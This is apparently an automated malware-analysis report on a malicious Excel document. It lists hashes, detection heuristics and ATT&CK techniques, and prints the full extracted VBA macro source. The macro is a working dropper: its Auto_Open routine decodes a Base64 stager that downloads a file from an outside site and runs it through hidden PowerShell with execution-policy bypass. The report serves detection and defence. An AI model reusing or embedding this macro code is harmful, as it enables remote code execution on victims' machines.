Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 972b598d709b66b3…

MALICIOUS

Office (OLE)

524.5 KB Created: 2008-02-22 01:34:36 Authoring application: Microsoft Excel First seen: 2019-02-10
MD5: d253d65adf4285fa5004cd96e647a11f SHA-1: 1983b60d923b01fcb14ba813532b2f41f2d6c2fe SHA-256: 972b598d709b66b35900dc21c5225e5f0d474f241fefa890b381089afd7d44ee
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file contains VBA macros with an Auto_Open subroutine that utilizes WScript.Shell to execute a command. This command is a Base64-decoded stager that downloads a payload from 'http://www.energydona'. The presence of Shell() and CreateObject calls, along with the Base64-decoded stager, strongly indicates a downloader or droppper functionality.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6372756-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6372756-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        command = "wscript.exe c:\\Users\\Public\\Documents\\Proxy.vbs"
    Set shell = CreateObject("WScript.Shell")
    shell.Run command, 0
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        command = "wscript.exe c:\\Users\\Public\\Documents\\Proxy.vbs"
    Set shell = CreateObject("WScript.Shell")
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
        Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
    Dim strContent, strContent1, strContent2
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.energydona Referenced by macro
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/iX/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8409 bytes
SHA-256: 56e147c073e4cd72aea7df7f3899aa9e091a50e154f13cf4792222b82abdbc3f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Chart3"
Attribute VB_Base = "0{00020821-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Chart4"
Attribute VB_Base = "0{00020821-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Chart5"
Attribute VB_Base = "0{00020821-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Chart6"
Attribute VB_Base = "0{00020821-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"
Sub DropDown21_Change()
    #If Not Mac Then
        lang = Int(Sheet1.Range("X1"))
        
        If lang = 2 Then
            ShowData "AD1:AV23", "B3:T25"
            ShowData2 "AL1:AN52", "B1:D52"
            
            Sheet1.Name = Sheet1.Range("z1").Value
            Sheet2.Name = Sheet1.Range("z2").Value
            Chart3.Name = Sheet1.Range("z3").Value
            Chart4.Name = Sheet1.Range("z4").Value
            Chart5.Name = Sheet1.Range("z5").Value
            Chart6.Name = Sheet1.Range("z6").Value
            
        Else
            ShowData "AD27:AV48", "B3:O22"
            ShowData2 "AG1:AI52", "B1:D52"
        
            Sheet1.Name = Sheet1.Range("y1").Value
            Sheet2.Name = Sheet1.Range("y2").Value
            Chart3.Name = Sheet1.Range("y3").Value
            Chart4.Name = Sheet1.Range("y4").Value
            Chart5.Name = Sheet1.Range("y5").Value
            Chart6.Name = Sheet1.Range("y6").Value
        
        End If
    #End If
End Sub

Sub ShowData(Rng, Target_Rng)

    Sheet1.Range(Target_Rng).Value = Sheet1.Range(Rng).Value

End Sub

Sub ShowData2(Rng, Target_Rng)

    Sheet2.Range(Target_Rng).Value = Sheet2.Range(Rng).Value

End Sub


Function Base64Decode(sText)
    Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
    oNode.DataType = "bin.base64"
    oNode.Text = sText
    Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
    Set oNode = Nothing
    Set oXML = Nothing
End Function

Function Stream_BinaryToString(Binary)
  Const adTypeText = 2
  Const adTypeBinary = 1
  Dim BinaryStream 'As New Stream
  Set BinaryStream = CreateObject("ADODB.Stream")
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.Write Binary
  BinaryStream.Position = 0
  BinaryStream.Type = adTypeText
  BinaryStream.Charset = "us-ascii"
  Stream_BinaryToString = BinaryStream.ReadText
  Set BinaryStream = Nothing
End Function

Sub Auto_Open()
    Dim strContent, strContent1, strContent2
    Dim shell, command
    Dim objFileToRead, objFileToWrite
    Dim strKey

    strContent1 = "RGltIHNoZWxsLGNvbW1hbmQNCkhUVFBEb3dubG9hZCAiaHR0cDovL3d3dy5lbmVyZ3lkb25h" & _
                "dGUuY29tL2ltYWdlcy9jaGFyYWN0ZXIuZ2lmIiwgIkM6XFxVc2Vyc1xcUHVibGljXFxEb2N1" & _
                "bWVudHNcXFByb3h5QXV0b1VwZGF0ZS5wczEiDQoNClN1YiBIVFRQRG93bmxvYWQoIG15VVJM" & _
                "LCBteVBhdGggKQ0KJyBUaGlzIFN1YiBkb3dubG9hZHMgdGhlIEZJTEUgc3BlY2lmaWVkIGlu" & _
                "IG15VVJMIHRvIHRoZSBwYXRoIHNwZWNpZmllZCBpbiBteVBhdGguDQonDQonIG15VVJMIG11" & _
                "c3QgYWx3YXlzIGVuZCB3aXRoIGEgZmlsZSBuYW1lDQonIG15UGF0aCBtYXkgYmUgYSBkaXJl" & _
                "Y3Rvcnkgb3IgYSBmaWxlIG5hbWU7IGluIGVpdGhlciBjYXNlIHRoZSBkaXJlY3RvcnkgbXVz" & _
                "dCBleGlzdA0KJw0KJyBXcml0dGVuIGJ5IFJvYiB2YW4gZGVyIFdvdWRlDQonIGh0dHA6Ly93" & _
                "d3cucm9idmFuZGVyd291ZGUuY29tDQonDQonIEJhc2VkIG9uIGEgc2NyaXB0IGZvdW5kIG9u" & _
                "IHRoZSBUaGFpIFZpc2EgZm9ydW0NCicgaHR0cDovL3d3dy50aGFpdmlzYS5jb20vZm9ydW0v" & _
                "aW5kZXgucGhwP3Nob3d0b3BpYz0yMTgzMg0KDQogICAgJyBTdGFuZGFyZCBob3VzZWtlZXBp" & _
                "bmcNCiAgICBEaW0gaSwgb2JqRmlsZSwgb2JqRlNPLCBvYmpIVFRQLCBzdHJGaWxlLCBzdHJN" & _
                "c2cNCiAgICBDb25zdCBGb3JSZWFkaW5nID0gMSwgRm9yV3JpdGluZyA9IDIsIEZvckFwcGVu" & _
                "ZGluZyA9IDgNCg0KICAgICcgQ3JlYXRlIGEgRmlsZSBTeXN0ZW0gT2JqZWN0DQogICAgU2V0" & _
                "IG9iakZTTyA9IENyZWF0ZU9iamVjdCggIlNjcmlwdGluZy5GaWxlU3lzdGVtT2JqZWN0IiAp" & _
                "DQoNCiAgICAnIENoZWNrIGlmIHRoZSBzcGVjaWZpZWQgdGFyZ2V0IGZpbGUgb3IgZm9sZGVy"
    strContent2 = "IGV4aXN0cywNCiAgICAnIGFuZCBidWlsZCB0aGUgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2Yg" & _
                "dGhlIHRhcmdldCBmaWxlDQoJSWYgb2JqRlNPLkZpbGVFeGlzdHMoIG15UGF0aCApIFRoZW4N" & _
                "CgkJRXhpdCBTdWINCglFbmQgSWYNCgkNCiAgICBJZiBvYmpGU08uRm9sZGVyRXhpc3RzKCBt" & _
                "eVBhdGggKSBUaGVuDQogICAgICAgIHN0ckZpbGUgPSBvYmpGU08uQnVpbGRQYXRoKCBteVBh" & _
                "dGgsIE1pZCggbXlVUkwsIEluU3RyUmV2KCBteVVSTCwgIi8iICkgKyAxICkgKQ0KICAgIEVs" & _
                "c2VJZiBvYmpGU08uRm9sZGVyRXhpc3RzKCBMZWZ0KCBteVBhdGgsIEluU3RyUmV2KCBteVBh" & _
                "dGgsICJcIiApIC0gMSApICkgVGhlbg0KICAgICAgICBzdHJGaWxlID0gbXlQYXRoDQogICAg" & _
                "RWxzZQ0KICAgICAgICBFeGl0IFN1Yg0KICAgIEVuZCBJZg0KDQogICAgJyBDcmVhdGUgb3Ig" & _
                "b3BlbiB0aGUgdGFyZ2V0IGZpbGUNCiAgICBTZXQgb2JqRmlsZSA9IG9iakZTTy5PcGVuVGV4" & _
                "dEZpbGUoIHN0ckZpbGUsIEZvcldyaXRpbmcsIFRydWUgKQ0KDQogICAgJyBDcmVhdGUgYW4g" & _
                "SFRUUCBvYmplY3QNCiAgICBTZXQgb2JqSFRUUCA9IENyZWF0ZU9iamVjdCggIldpbkh0dHAu" & _
                "V2luSHR0cFJlcXVlc3QuNS4xIiApDQoNCiAgICAnIERvd25sb2FkIHRoZSBzcGVjaWZpZWQg" & _
                "VVJMDQogICAgb2JqSFRUUC5PcGVuICJHRVQiLCBteVVSTCwgRmFsc2UNCiAgICBvYmpIVFRQ" & _
                "LlNlbmQNCg0KICAgICcgV3JpdGUgdGhlIGRvd25sb2FkZWQgYnl0ZSBzdHJlYW0gdG8gdGhl" & _
                "IHRhcmdldCBmaWxlDQogICAgRm9yIGkgPSAxIFRvIExlbkIoIG9iakhUVFAuUmVzcG9uc2VC" & _
                "b2R5ICkNCiAgICAgICAgb2JqRmlsZS5Xcml0ZSBDaHIoIEFzY0IoIE1pZEIoIG9iakhUVFAu" & _
                "UmVzcG9uc2VCb2R5LCBpLCAxICkgKSApDQogICAgTmV4dA0KDQogICAgJyBDbG9zZSB0aGUg" & _
                "dGFyZ2V0IGZpbGUNCiAgICBvYmpGaWxlLkNsb3NlKCApDQpFbmQgU3ViDQoNCmNvbW1hbmQg" & _
                "PSAicG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZXAgQnlwYXNzIC1Ob0xv" & _
                "Z28gLU5vUHJvZmlsZSAtZmlsZSBDOlxcVXNlcnNcXFB1YmxpY1xcRG9jdW1lbnRzXFxQcm94" & _
                "eUF1dG9VcGRhdGUucHMxIg0Kc2V0IHNoZWxsID0gQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNo" & _
                "ZWxsIikNCnNoZWxsLlJ1biBjb21tYW5kLDA="
    strContent = strContent1 + strContent2
    strContent = Base64Decode(strContent)
    Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\\Users\\Public\\Documents\\Proxy.vbs", 2, True)
    objFileToWrite.Write (strContent)
    objFileToWrite.Close
    
    command = "wscript.exe c:\\Users\\Public\\Documents\\Proxy.vbs"
    Set shell = CreateObject("WScript.Shell")
    shell.Run command, 0
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.